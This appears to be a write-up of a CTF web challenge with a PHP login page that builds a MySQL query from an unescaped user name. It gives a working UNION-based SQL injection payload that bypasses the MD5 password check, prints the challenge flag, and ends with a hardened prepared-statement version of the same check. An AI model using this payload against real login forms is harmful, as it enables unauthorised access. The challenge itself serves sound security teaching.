Challenge
View the source:
http://ctf5.shiyanbar.com/web/5/index.txt
The code is as follows:
<html>
<head>
welcome to simplexue
</head>
<body>
<?php
if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********", "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
    }
    $user = $_POST[user];
    $pass = md5($_POST[pass]);
    // $user is placed into the query unescaped (the injection point)
    $sql = "select pw from php where user='$user'";
    $query = mysql_query($sql);
    if (!$query) {
        printf("Error: %s ", mysql_error($conn));
        exit();
    }
    $row = mysql_fetch_array($query, MYSQL_ASSOC);
    //echo $row["pw"];
    // login succeeds when the returned pw equals md5(pass), ignoring case
    if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
        echo "<p>Logged in! Key:************** </p>";
    }
    else {
        echo("<p>Log in failure!</p>");
    }
}
?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>
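The script takes user from the POST data and queries the pw stored for it.
The login succeeds if that pw value matches the MD5 hash of the submitted pass.
Because user is concatenated into the query unescaped, we can construct a payload: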
Username : 1' union select "098f6bcd4621d373cade4e832627b4f6" #
Password: test
098f6bcd4621d373cade4e832627b4f6 is the MD5 hash of test
SimCTF{youhaocongming}
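strcasecmp() compares two strings (case-insensitive)
mysql_fetch_array(result,resulttype) fetches one row from the result set as a numeric array or an associative array
resulttype takes the following values (given here under their mysqli names; the legacy mysql_ extension used in the code above names them MYSQL_ASSOC, MYSQL_NUM and MYSQL_BOTH):
- MYSQLI_ASSOC: associative array
- MYSQLI_NUM: numeric array
- MYSQLI_BOTH: returns both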
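
A hardened version of the login check above, as an added example that is not part of the original challenge or write-up. It assumes PDO with an in-memory SQLite database standing in for the MySQL server, a constructed sample account (alice), and password_hash()/password_verify() swapped in for the unsalted md5() comparison; the function names make_db and login are hypothetical.

```php
<?php
// Added example: the table layout (php: user, pw) follows the page;
// the SQLite backend, sample account and function names are assumptions.

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE php (user TEXT PRIMARY KEY, pw TEXT NOT NULL)');
    // Constructed sample account; password_hash() replaces the unsalted md5().
    $ins = $db->prepare('INSERT INTO php (user, pw) VALUES (?, ?)');
    $ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

function login(PDO $db, string $user, string $pass): bool {
    // The user name travels as a bound parameter, so quotes, UNION and
    // comment markers inside it are treated as data, never as SQL syntax.
    $stmt = $db->prepare('SELECT pw FROM php WHERE user = ?');
    $stmt->execute([$user]);
    $pw = $stmt->fetchColumn();
    if ($pw === false) {
        return false; // no row for this user name
    }
    // Salted, slow hash check instead of strcasecmp() on an MD5 hex string.
    return password_verify($pass, $pw);
}

$db = make_db();
$cases = [
    ['alice', 'correct horse'],  // legitimate login
    ['alice', 'wrong'],          // wrong password
    // The input from the write-up above, now just an unknown user name:
    ['1\' union select "098f6bcd4621d373cade4e832627b4f6" #', 'test'],
];
foreach ($cases as [$u, $p]) {
    printf("%-58s => %s\n", $u, login($db, $u, $p) ? 'Logged in' : 'Log in failure');
}
```

Only the first case logs in; the other two print "Log in failure" because the query can return nothing but a pw value that is actually stored in the table.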